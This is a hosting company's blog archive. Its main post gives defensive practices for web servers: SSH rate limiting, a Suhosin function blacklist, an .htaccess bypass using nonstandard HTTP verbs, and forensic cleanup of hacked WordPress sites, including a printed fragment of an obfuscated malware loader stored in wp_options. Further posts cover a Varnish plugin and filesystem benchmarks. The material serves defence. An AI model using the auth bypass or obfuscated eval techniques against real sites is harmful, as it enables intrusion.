Archive for the ‘Web Infrastructure’ Category

Our best practices regarding a web hosting environment

Monday, July 9th, 2012

Over the years we’ve had to deal with persistent security scans from hosts around the world checking whether our installations were secure. After witnessing a competitor implode this morning as the result of a hack, I’m putting this out as a few of our best practices when dealing with Virtual and Dedicated web hosting. When he called, he was ready to close shop and offered to let us clean up; we cleaned up quite a bit, but he’s still got a lot of work to do.

SSH

One of the worst offenders is the SSH bot that comes in and tries 60,000 password combinations on your machine. Since SSH requires a secure handshake, each attempt uses a bit of CPU. As a result, when you have 200 IP addresses on a machine and their script goes through them sequentially, you’re dealing with 12 million authentication attempts.

The first thing we did was limit our machines to answer only on the primary IP address, which cut our exposure tremendously. You could move SSH to an alternate port. If you do move it, make sure to use a port number lower than 1024. Ports above 1024 can be bound by unprivileged users, and you don’t want someone who has crashed the SSH daemon via the OOM killer to start their own in its place; accidentally accepting the new key when you log in under pressure results in a compromised account. Due to a number of issues, we left SSH answering on port 22, but used ipt_recent (the iptables ‘recent’ match) to allow 6 connections from an IP address within a minute before that IP address is blocked. An attacker could work around this by making one authentication request every 12 seconds, or by using multiple proxy servers, but it is usually easier for them to let the automated scan run and move on when they don’t find anything quickly enough.

# track each source IP that opens a new connection to ssh
/sbin/iptables -A INPUT -p tcp --dport ssh -i eth0 -m state --state NEW -m recent --set
# drop a source that opens 6 or more new connections within 60 seconds
/sbin/iptables -A INPUT -p tcp --dport ssh -i eth0 -m state --state NEW -m recent --update --seconds 60 --hitcount 6 -j DROP

Another possibility is Fail2ban. Fail2ban can report back to a central server and works with numerous SSH daemon log formats. Personally, I prefer ipt_recent for its ease of use – it protects a service without worrying about which daemon is running, and it is self-healing.

Depending on your client needs, you could also use port knocking: port 22 stays closed unless the firewall first sees SYN packets on two other ports. Both an unlock and a lock sequence can be added, and it can be configured to admit the IP you’re currently connecting from. Handy if you’re on the road and need to connect in, but don’t want to leave your connection wide open.
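As a sketch, assuming knockd as the knocking daemon (the port sequences below are made-up examples), the configuration looks something like this:

[options]
        logfile = /var/log/knockd.log

[openSSH]
        sequence    = 7000,8000
        seq_timeout = 5
        tcpflags    = syn
        # %IP% is replaced by the knocking client's address
        command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT

[closeSSH]
        sequence    = 8000,7000
        seq_timeout = 5
        tcpflags    = syn
        command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT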

POP3/IMAP

POP3 receives a ton of attempts – more so than IMAP, but they are usually served by the same daemon. You can use the ipt_recent rule above to limit connections, but some of the scan scripts are smart enough to pipeline requests over a single connection. Adjust your daemon to return failures after 3 attempts without checking the backend, and all the scanner collects is a string of failed attempts.

Make sure you support TLS – possibly even disabling plaintext authentication, as almost every email client out there supports SSL connections.
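A sketch of the relevant settings, assuming Dovecot is your POP3/IMAP daemon (other daemons have equivalent knobs):

# dovecot.conf
disable_plaintext_auth = yes
ssl = yes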

FTP

For a while, we limited FTP to the primary machine IP due to a number of scans. ipt_recent doesn’t work well here either, as some FTP clients will open 10-50 connections to transfer data more quickly. Choosing a lightweight FTP daemon with some protections built in makes a difference. You can also have only the primary IP answer and set up a CNAME of ftp.theirdomain.com pointing at the hostname to avoid some confusion. Plain FTP passes credentials and data over the wire unencrypted, so you should support FTP over TLS (FTPS) or, if possible, SFTP. Most FTP client software understands both.

www

With SQL injections, ZmEu scans, and everyone looking for vulnerabilities and exploits, there are a number of things that can be done. The problem is that once they find a vulnerability, exploit code is usually left on the server. That code might run attacks against other machines, send spam, or give them a remote shell.

One method of finding out what is being executed – without Suhosin actually breaking things – is to run in simulation mode with the following patch (around line 1600) in execute.c:

        } else if (SUHOSIN_G(func_blacklist) != NULL) {
                if (zend_hash_exists(SUHOSIN_G(func_blacklist), lcname, function_name_strlen+1)) {
                        suhosin_log(S_EXECUTOR, "function within blacklist called: %s()", lcname);
                      /*goto execute_internal_bailout;*/
                }
        }

You want to comment out the goto execute_internal_bailout; line so that a blacklist hit only logs to syslog; without the patch, simulation mode doesn’t actually run as a simulation here and still breaks execution. This way, you can add functions to your blacklist, run in simulation mode, and actually see what is being executed.

If you’ve never built it: untar it, phpize, ./configure, make (verify that it has built sanely), make install, modify the config file, restart Apache, and check the error log for segfaults.
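A sketch of those steps on a Debian-style system (the tarball version and paths are examples):

tar xzf suhosin-0.9.33.tgz
cd suhosin-0.9.33
phpize
./configure
make                # verify it built sanely before installing
make install        # drops suhosin.so into the PHP extension directory
# add the extension and settings to the PHP config, then:
/etc/init.d/apache2 restart
tail /var/log/apache2/error.log   # watch for segfaults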

Some somewhat sane defaults:

suhosin.simulation = on
suhosin.executor.func.blacklist = include,include_once,require_once,passthru,eval,system,popen,exec,shell_exec,preg_replace,mail
suhosin.log.syslog.facility = 5
suhosin.log.syslog.priority = 1

Why preg_replace?

There are a number of ways to execute a command, but PHP allows the e PCRE modifier, which evals the result:

preg_replace("/.*/e","\x65\x76\x61\x6C\x28");

The hex escapes decode to eval( – obfuscation like this is exactly why logging what actually executes beats grepping source for function names.

You can run mod_security, but so many software developers have problems with it that the default .htaccess shipped with many applications just disables mod_security altogether. It isn’t really security if it gets disabled.

One issue with WordPress is that it handles 404s itself, but it has to do a fair amount of work before it can determine that a request is a 404. ZmEu scans multiple IP addresses and hammers away with a few thousand requests, most of which 404 when a WordPress site answers on the bare IP.

The quick solution to this is to create virtualhost entries for the bare IPs that point somewhere, i.e. a parking page.

#!/usr/bin/python

# Emit an Apache VirtualHost for every bound IP so that scanners
# hitting bare IPs get a parking page instead of a real site.

import os

DEFAULT_PATH = '/var/www/uc'

# list the machine's addresses, skipping loopback
ips = os.popen('/sbin/ifconfig -a|grep "inet addr"|cut -f 2 -d ":"|cut -f 1 -d " "|grep -v 127.0.0.1')
for ip in ips:
    print """
<VirtualHost %s:80>
ServerName %s
DocumentRoot %s
</VirtualHost>""" % (ip.strip(), ip.strip(), DEFAULT_PATH)

Now, when ZmEu or any of the other scanners comes along, rather than hammering away at a WordPress or Joomla site, it is handed a parking page and the 404s are handled far more cheaply. This works because ZmEu scans the IP without sending a hostname in most cases. Once scanners start using hostnames, this method won’t provide as much utility.

Another issue years ago was having DocumentRoot set to /var/www while domains lived in /var/www/domain.com and /var/www/domainb.com. domain.com and domainb.com would each have a /cgi-bin/ directory set up with ScriptAlias, but if you visited the machine on a bare IP that didn’t match a VirtualHost, scanners could walk the whole DocumentRoot. Files saved in /cgi-bin/ that should have been executed usually wouldn’t execute and would be handed back with Content-Type: text/plain, exposing datafiles. Make sure DocumentRoot in the base configuration points to a directory that is not the parent of multiple domain directories.
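In the base Apache configuration, that means something like this (the empty directory is a hypothetical example):

# default/base config – never the parent of the per-domain docroots
DocumentRoot /var/www/empty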

.htaccess

I don’t know how this one started or why it ever happened, but many tools on the internet that generate an .htaccess to password protect your directory share one fatal flaw. I covered this a bit more in depth in another post, but, briefly, the site is protected with the following .htaccess:

AuthUserFile .htpasswd
AuthName "Protected Area"
AuthType Basic

<Limit GET POST>
require valid-user
</Limit>

Since the directory is only protected against GET and POST requests, any other verb sails through. Send a request with a nonstandard method such as GETS and the <Limit> block doesn’t match, yet PHP still executes and serves the page. In fact, almost anything other than one of those two verbs will get results without having to be authenticated.
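The fix is to drop the <Limit> wrapper (or use <LimitExcept GET POST>) so that every method requires authentication – a sketch, with an example htpasswd path:

AuthUserFile /home/username/.htpasswd
AuthName "Protected Area"
AuthType Basic
require valid-user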

WordPress

One of the most popular pieces of software our clients use is WordPress, followed by Joomla. Both have numerous updates throughout the year, bundling features with security patches, which makes upgrading somewhat painful for people. A recent patch rolled in with 3.4 and 3.4.1 fixed security issues but broke a number of themes, causing a bit of pain for clients. Joomla isn’t immune from this either and has shipped multiple security upgrades bundled with features that break backwards compatibility.

If you run multiple WordPress sites on a single machine, take a look at this post which contains code to upgrade WordPress sites from the command line.

Plugins are the second issue. WordPress and some plugins bundle third-party code, but when that bundled code has a security update, the plugin that bundled it often doesn’t get updated. timthumb.php comes to mind: we found it bundled in numerous plugins and had to do a little grep/awk magic to replace every copy. One plugin updated, but overwrote timthumb.php with an exploitable version – causing all sorts of discontent.
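A sketch of that hunt, assuming sites live under /var/www (copies are often renamed – thumb.php is common – so grep for the banner as well):

find /var/www \( -name 'timthumb.php' -o -name 'thumb.php' \)
grep -rl --include='*.php' 'TimThumb' /var/www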

SetUID versus www-data

I’ve got a much longer post regarding this. Suffice it to say that no one will ever agree one way or the other, but I feel that limiting what a site can write to on disk is better than allowing the webserver to write over the entire site. With www-data mode, a compromised WordPress site may only allow writes to the theme directory or the upload directory, eliminating the ability to damage most of the rest of the site. Joomla, however, leaves the FTP password in the clear in a config file. Once a Joomla site running in www-data mode has been hacked, the FTP password has been exposed and can be used to modify the site.
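A sketch of the www-data layout (the site user and paths are hypothetical): the site is owned by its own user and read-only to Apache, with only the directories that genuinely need writes opened up:

chown -R siteuser:siteuser /var/www/example.com
find /var/www/example.com -type d -exec chmod 755 {} \;
find /var/www/example.com -type f -exec chmod 644 {} \;
# only uploads (and perhaps the theme directory) writable by the webserver
chgrp -R www-data /var/www/example.com/wp-content/uploads
chmod -R g+w /var/www/example.com/wp-content/uploads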

Ok, so the site has been hacked, now what?

Restore backups and keep on running? Regrettably, that is what most hosting companies do. If you have done any of the above, particularly the Suhosin patch, you can look through the logs to see what was executed. Even code that is Zend Optimized will trigger a syslog entry, so you can at least see what may be happening. If you run in www-data mode, new .php files owned by www-data are prime suspects, especially in directories that shouldn’t contain executable code. Over the years, I’ve attempted to get WordPress to disable .php execution in the /uploads directory, to no avail. Since a remote exploit may allow the attacker to save a file, wp-content/uploads is a common dumping ground for a later remote shell. Sometimes they’ll get creative and drop a file like /wp-content/uploads/2012/05/blueberry.jpg.php next to your blueberry.jpg.
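You can disable it yourself, though – a sketch for Apache 2.2 with mod_php, dropped into wp-content/uploads/.htaccess:

# refuse to serve or execute any .php file under uploads
<FilesMatch "\.php$">
    Order allow,deny
    Deny from all
</FilesMatch>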

There are a number of things to look for: modified times (though hackers sometimes reset file timestamps to match other files in the directory), .php files where they shouldn’t be, etc. There are other tricks – sometimes they will modify .htaccess to run a .jpeg as .php – so you can’t always depend on extensions. If they can’t upload a remote exploit, they may upload a .jpg file that actually contains PHP code, to be remotely included from another exploited site. Since PHP doesn’t check the mime type on an include, exploit code could be sitting on your server.
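A few starting points for that search (a sketch; adjust the paths to your layout):

# PHP files the webserver itself wrote
find /var/www -name '*.php' -user www-data
# PHP files changed within the last week
find /var/www -name '*.php' -mtime -7
# PHP anywhere under an uploads tree
find /var/www -path '*wp-content/uploads*' -name '*.php'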

Even mime type validation of uploads isn’t always enough.

Javascript exploits are some of the toughest to ferret out of a site. Viewing the source of a document usually shows the pre-rendered version, and if the exploit was snuck onto the end of jquery.1.7.min.js, the page can be modified after it has loaded. Firefox’s ‘View Generated Source’ option makes it a little easier to track this down. Be prepared for some obfuscation, as the code is often lightly encrypted. A Live HTTP Headers plugin can also give you a hostname to grep for in the contents of the site.

One of the trickier WordPress exploits used wp_options _transient_feed_ variables to store exploit code. Cleaning that up was tricky to say the least: the code was gzipped, base64 encoded, stored as an option variable, and hooked into a plugin very cleanly.

Some of the code found in the template:

$z=get_option("_transient_feed_8130f985e7c4c2eda46e2cc91c38468d");
$z=base64_decode(str_rot13($z)); if(strpos($z,"2A0BBFB0")!==false){ 

and in wp_options:

| 2537 | 0 | _transient_feed_8130f985e7c4c2eda46e2cc91c38468d | s:50396:"nJLbVJEyMzyhMJDbWmWOZRWPExVjWlxcrj0XVPNtVROypaWipy9lMKOipaEcozpbZPx7VROcozyspzImqT9lMFtvp2SzMI9go2E
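One way to spot this class of infection is to look for suspiciously large transients directly in MySQL – a sketch, assuming the default wp_ table prefix:

SELECT option_name, LENGTH(option_value) AS len
FROM wp_options
WHERE option_name LIKE '%transient_feed%'
ORDER BY len DESC;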

The trick to a cleanup is to be meticulous in your analysis. File dates, file ownership, what was changed, and what logging was in place all provide clues. Sometimes you won’t find the original exploit on the first runthrough and will have to install a bit more logging.

If you still don’t have a good idea, you can do something like this:

.htaccess:

php_value include_path ".:/var/www/php"
php_value auto_prepend_file postlog.php

postlog.php

<?php

// Log every POST request (with cookies and raw body) for later forensics.
// 11.222. is our monitoring/local prefix - requests from it are not logged.
if ( (isset( $HTTP_RAW_POST_DATA ) || !empty( $_POST )) &&
     (strpos( $_SERVER['REMOTE_ADDR'], '11.222.' ) === FALSE)
   ) {

  if ( !isset( $HTTP_RAW_POST_DATA ) ) {
    $HTTP_RAW_POST_DATA = file_get_contents( 'php://input' );
  }

  $buffer = "Date: " . date('M/d/Y H:i') . "\nSite: {$_SERVER[ 'HTTP_HOST' ]}\nURL: {$_SERVER[ 'REQUEST_URI' ]}\nPOST request from: {$_SERVER[ 'REMOTE_ADDR' ]}\n\nPOST DATA:: " . print_r( $_POST, 1 ) . "\nCOOKIES: " . print_r( $_COOKIE, 1 ) . "\nHTTP_RAW_POST_DATA: $HTTP_RAW_POST_DATA\nSERVER Data:" . print_r( $_SERVER, 1 ) . "\n----------\n";

  // one log file per day, per script name
  $tmp = explode( '/', $_SERVER[ 'SCRIPT_NAME' ] );
  $fn = array_pop( $tmp );
  $fh = fopen( '/home/username/postlog/' . date('Ymd') . '.' . $fn, 'a+' );
  fwrite( $fh, $buffer );
  fclose( $fh );
}
?>

This logs every POST request made to the site to a file. If the site gets exploited again, you have a forensic log to go back through.

The single biggest thing I can say is keep your applications updated. I know most webhosts don’t pay attention to what is running on their machines, but, it is usually easier to prevent things from breaking than to fix them after they’ve broken.

My competitor? They’re on hour 72 cleaning things up since they don’t maintain two generations of weekly backups.

Finally, a formal release for my WordPress + Varnish + ESI plugin

Tuesday, January 10th, 2012

A while back I wrote a plugin to take care of a particular client traffic problem. The traffic came in very quickly and unexpectedly, so I had only minutes to come up with a solution. Since I knew Varnish pretty well, my initial reaction was to put the site behind Varnish. But there’s a problem with Varnish and WordPress.

WordPress is a cookie monster. It uses and depends on cookies for almost everything – and, out of the box, Varnish doesn’t cache requests that carry cookies. The VCL was modified and tweaked, but the site was still having problems.
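The usual first tweak looks something like this (a sketch in Varnish 3 VCL; the extension list is an example):

sub vcl_recv {
    # static assets never need WordPress cookies - strip them so they cache
    if (req.url ~ "\.(css|js|png|jpg|gif|ico)$") {
        unset req.http.Cookie;
    }
}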

So, a plugin was born. Since I was familiar with ESI, I wrote a quick plugin to cache the sidebar while the content was handled by Varnish. On each request, Varnish would assemble the Edge Side Include and serve the page – saving the server from a meltdown.
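Mechanically, the theme emits an ESI tag where the sidebar belongs, and the VCL tells Varnish to process ESI on the response – a sketch (the /esi/sidebar/ URL is hypothetical):

<!-- in the page markup -->
<esi:include src="/esi/sidebar/"/>

# in the VCL (Varnish 3):
sub vcl_fetch {
    set beresp.do_esi = true;
}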

The plugin was never really production ready, though I have used it for a year or so when particular client needs came up. When Varnish released 3.0, ESI gained the ability to work with gzipped/deflated content, which significantly increased the utility of the plugin.

If you would like to read a detailed explanation of how the plugin works and why, here’s the original presentation I gave in Florida.

You can find the plugin on WordPress’s plugin hosting at http://wordpress.org/extend/plugins/cd34-varnish-esi/.

Hey Blackberry, do you get paid for Bandwidth burned on data networks?

Thursday, January 5th, 2012

Requests from:

User-Agent: BlackBerry8530/5.0.0.886 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/105
Accept: application/vnd.rim.html,text/html,application/xhtml+xml,
application/vnd.wap.xhtml+xml,text/vnd.sun.j2me.app-descriptor,
image/vnd.rim.png,image/jpeg,application/xvnd.rim.pme.b,
application/vnd.rim.ucs,image/gif;anim=1,application/vnd.rim.jscriptc;
v=0-8-72,application/x-javascript,application/vnd.rim.css;v=2,text/css;
media=screen,application/vnd.wap.wmlc;q=0.9,application/vnd.wap.wmlscriptc;q=0.7,
text/vnd.wap.wml;q=0.7,*/*;q=0.5

We prefer a number of content-types, but, if worse comes to worst, we’ll accept everything anyhow.

440 bytes transmitted on EVERY request made from a Blackberry when you could have just done:

Accept: */*

and saved 428 bytes PER request.

This particular page had 97 assets, amounting to almost 32k in wasted bandwidth sending headers to the CDN.

Ext4, XFS and BtrFS benchmarks and testing

Tuesday, November 1st, 2011

Recently I talked about versioning filesystems available for OSS systems. While most of our server farms use XFS, we have been moving to Ext4 on a number of machines. This wasn’t done as a precursor to BtrFS, but because of problems we’ve been having with XFS on very large filesystems. The fact that we can migrate Ext4 to BtrFS in place is just a coincidental bonus.

While ZFS is still a consideration if we move to FreeBSD (I was not impressed enough with Debian’s K*BSD project to consider it stable for production), I felt BtrFS was worth a look. There is also CephFS, but that requires a little more infrastructure – you need to run a cluster – and it isn’t really made for single-machine deployments.

We’re also going to make some assumptions and do things you might not want to do on a home system. Since the data center we’re in has a 100% power SLA, we can be reasonably sure we won’t lose power and can be a little more aggressive. We disable atime, which may negatively impact clients if the disk handles your mailspool. Also, recent versions of XFS handle atime updates much differently, so the performance boost from noatime is negligible there.

Command used to test (-s 8g uses an 8GB test file – four times RAM, to defeat caching – and -n 512 creates 512*1024 files for the metadata tests):

/usr/sbin/bonnie++ -s 8g -n 512

Ext4

mkfs -t ext4 /dev/sda5
mount -o noatime /dev/sda5 /mnt

Results:

Version  1.96       ------Sequential Output------ --Sequential Input- --Random-
Concurrency   1     -Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks--
Machine        Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP  /sec %CP
version          8G   332  99 54570  12 23512   5  1615  98 62905   6 131.8   3
Latency             24224us     471ms     370ms   13739us     110ms    5257ms
Version  1.96       ------Sequential Create------ --------Random Create--------
version             -Create-- --Read--- -Delete-- -Create-- --Read--- -Delete--
              files  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP
                512 24764  69 267757  98  2359   6 25084  67 388005  98  1403   3
Latency              1258ms    1402us   11767ms    1187ms      66us   11682ms

1.96,1.96,version,1,1320193244,8G,,332,99,54570,12,23512,5,1615,98,62905,6,131.8,3,512,,,,,24764,69,267757,98,2359,6,25084,67,388005,98,1403,3,24224us,471ms,370ms,13739us,110ms,5257ms,1258ms,1402us,11767ms,1187ms,66us,11682ms

Ext4 with journal conversion and mount options

mkfs -t ext4 /dev/sda5
tune2fs -o journal_data_writeback /dev/sda5
mount -o rw,noatime,data=writeback,barrier=0,nobh,commit=60 /dev/sda5 /mnt

Results:

Version  1.96       ------Sequential Output------ --Sequential Input- --Random-
Concurrency   1     -Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks--
Machine        Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP  /sec %CP
version          8G   335  99 53396  11 25240   6  1619  99 62724   6 130.9   5
Latency             23955us     380ms     231ms   15962us     143ms   16261ms
Version  1.96       ------Sequential Create------ --------Random Create--------
version             -Create-- --Read--- -Delete-- -Create-- --Read--- -Delete--
              files  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP
                512 24253  65 266963  98  2341   6 24567  65 389243  98  1392   3
Latency              1232ms    1405us   11500ms    1232ms     130us   11543ms

1.96,1.96,version,1,1320192213,8G,,335,99,53396,11,25240,6,1619,99,62724,6,130.9,5,512,,,,,24253,65,266963,98,2341,6,24567,65,389243,98,1392,3,23955us,380ms,231ms,15962us,143ms,16261ms,1232ms,1405us,11500ms,1232ms,130us,11543ms

XFS:

mkfs -t xfs -f /dev/sda5
mount -o noatime /dev/sda5 /mnt

Results:

Version  1.96       ------Sequential Output------ --Sequential Input- --Random-
Concurrency   1     -Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks--
Machine        Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP  /sec %CP
version          8G   558  98 55174   9 26660   6  1278  96 62598   6 131.4   5
Latency             14264us     227ms     253ms   77527us   85140us     773ms
Version  1.96       ------Sequential Create------ --------Random Create--------
version             -Create-- --Read--- -Delete-- -Create-- --Read--- -Delete--
              files  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP
                512  2468  19 386301  99  4311  25  2971  22 375624  99   546   3
Latency              1986ms     346us    1341ms    1580ms      82us    5904ms

1.96,1.96,version,1,1320194740,8G,,558,98,55174,9,26660,6,1278,96,62598,6,131.4,5,512,,,,,2468,19,386301,99,4311,25,2971,22,375624,99,546,3,14264us,227ms,253ms,77527us,85140us,773ms,1986ms,346us,1341ms,1580ms,82us,5904ms

XFS, mount options:

mkfs -t xfs -f /dev/sda5
mount -o noatime,logbsize=262144,logbufs=8 /dev/sda5 /mnt

Results:

Version  1.96       ------Sequential Output------ --Sequential Input- --Random-
Concurrency   1     -Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks--
Machine        Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP  /sec %CP
version          8G   563  98 55423   9 26710   6  1328  99 62650   6 129.5   5
Latency             14401us     345ms     298ms   20328us     119ms     357ms
Version  1.96       ------Sequential Create------ --------Random Create--------
version             -Create-- --Read--- -Delete-- -Create-- --Read--- -Delete--
              files  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP
                512  3454  26 385552 100  5966  35  4459  34 375917  99   571   3
Latency              1625ms     360us    1323ms    1243ms      67us    5060ms

1.96,1.96,version,1,1320196498,8G,,563,98,55423,9,26710,6,1328,99,62650,6,129.5,5,512,,,,,3454,26,385552,100,5966,35,4459,34,375917,99,571,3,14401us,345ms,298ms,20328us,119ms,357ms,1625ms,360us,1323ms,1243ms,67us,5060ms

XFS, file system creation options and mount options:

mkfs -t xfs -d agcount=32 -l size=64m -f /dev/sda5
mount -o noatime,logbsize=262144,logbufs=8 /dev/sda5 /mnt

Results:

Version  1.96       ------Sequential Output------ --Sequential Input- --Random-
Concurrency   1     -Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks--
Machine        Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP  /sec %CP
version          8G   561  97 54674   9 26502   6  1235  95 62613   6 131.4   5
Latency             14119us     346ms     247ms   94238us   76841us     697ms
Version  1.96       ------Sequential Create------ --------Random Create--------
version             -Create-- --Read--- -Delete-- -Create-- --Read--- -Delete--
              files  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP
                512  9576  73 383305 100 14398  85  9156  70 373557  99  2375  14
Latency              1110ms     375us     301ms     850ms      36us    5772ms

1.96,1.96,version,1,1320198613,8G,,561,97,54674,9,26502,6,1235,95,62613,6,131.4,5,512,,,,,9576,73,383305,100,14398,85,9156,70,373557,99,2375,14,14119us,346ms,247ms,94238us,76841us,697ms,1110ms,375us,301ms,850ms,36us,5772ms

BtrFS:

mkfs -t btrfs /dev/sda5
mount -o noatime /dev/sda5 /mnt

Also, make sure CONFIG_CRYPTO_CRC32C_INTEL is built into the kernel or loaded as a module, and that you’re on an Intel CPU – BtrFS checksums data with CRC32C and benefits from the hardware instruction.

Version  1.96       ------Sequential Output------ --Sequential Input- --Random-
Concurrency   1     -Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks--
Machine        Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP  /sec %CP
version          8G   254  99 54778   9 23070   8  1407  92 59932  13 131.2   5
Latency             31553us     264ms     826ms   94269us     180ms   17963ms
Version  1.96       ------Sequential Create------ --------Random Create--------
version             -Create-- --Read--- -Delete-- -Create-- --Read--- -Delete--
              files  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP
                512 17034  83 256486 100 13485  97 15282  76 38942  73  1472  23
Latency               126ms    2162us   11295us   71992us   20713us   28647ms

1.96,1.96,version,1,1320204006,8G,,254,99,54778,9,23070,8,1407,92,59932,13,131.2,5,512,,,,,17034,83,256486,100,13485,97,15282,76,38942,73,1472,23,31553us,264ms,826ms,94269us,180ms,17963ms,126ms,2162us,11295us,71992us,20713us,28647ms

Analysis

Ext4 is considerably better than Ext3 was the last time we ran these checks. Even compared with the allocation group tweaks and mount options we use on XFS, Ext4 isn’t a bad alternative and shows some improvements. BtrFS, however, even with the Intel CRC hardware acceleration, shows a significant drop in the Random Create Read benchmark.

I believe our recent conversion to Ext4 isn’t negatively impacting things based on the typical workload machines see.

I’ll continue to work with BtrFS and see if I can figure out why that one particular benchmark performs so poorly; in any case, some of the other features BtrFS offers as a versioning filesystem will be quite useful.

Machine specs:

* Linux version 3.1.0 #3 SMP Tue Nov 1 16:23:42 EDT 2011 i686 GNU/Linux
* P4/3.0ghz, 2gb RAM
* Western Digital SATA2 320gb 7200 RPM Drive

Versioning Filesystem choices using OSS

Tuesday, November 1st, 2011

One of the clusters we have uses DRBD between two machines with GFS2 mounted on DRBD in dual primary. I’d played around with Gluster and Lustre, OCFS2, AFS and many others and I’ve used NetApps in the past, but, I’ve never been extremely happy with any of the distributed and clustered filesystems.

My recent thinking on SetUID or SetGID modes to deal with particular problems led me to look at versioning filesystems. Currently that leaves ZFS and BtrFS.

I’ve used ZFS in the past on Solaris, and it is supported natively within FreeBSD. Since we use Debian, there is Debian’s K*BSD project, which puts the Debian userland on the BSD kernel – making most of our in-house management processes easy to convert. Using ZFS under Linux requires FUSE, which could introduce performance issues.

The other option we have is BtrFS. BtrFS is less mature, but it has the ability to handle in-place migrations from ext3/ext4. While this doesn’t really help much since we primarily run XFS, future machines could use ext4 until BtrFS is deemed stable enough, at which point they could be converted live.

In testing, XFS and Ext4 have similar performance when well tuned, which means we shouldn’t see any significant difference with either. Granted, this disagrees with some current benchmarks, but those benchmarks didn’t appear to set the filesystem up correctly or modify the mount parameters to allow for more buffers. When dealing with small files, XFS needs a little more RAM, and the journal logbuffers need to be increased – keeping more of the log in RAM before it is replayed and committed. Large file performance is usually deemed superior with XFS, but by properly tuning Ext3 (and by inference, Ext4) we can change its performance characteristics and get about 95% of XFS’s large file performance.

Currently we keep two generations of weekly machine backups. While that wouldn’t change, we could add checkpointing and more frequent snapshots, so a file that was uploaded and then modified or deleted would have a much better chance of being restorable. One of the attractions of versioning filesystems is the ability to take hourly or daily snapshots, which should reduce the data loss if a site is exploited or catastrophically damaged through a mistake.
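On BtrFS, a snapshot is cheap enough to run from cron – a sketch, with hypothetical paths:

# hourly snapshot of the subvolume mounted at /home
/sbin/btrfs subvolume snapshot /home /home/.snapshots/$(date +%Y%m%d%H)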

So, we’ve got three potential solutions in order of confidence that the solution will work:

* FreeBSD ZFS
* Debian/K*BSD ZFS
* Debian BtrFS

This weekend I’ll start putting the two Debian solutions through their paces to see if I feel comfortable with either. I’ve got a chassis swap to do this week and we’ll probably switch that machine from XFS to Ext4 in preparation as well. Most of the new machines we’ve been putting online now use Ext4 due to some of the issues I’ve had with XFS.

Ideally, I would like to start using BtrFS on every machine, but, if I need to move things over to FreeBSD, I would have to make some very tough decisions and migrations.

Never a dull moment.
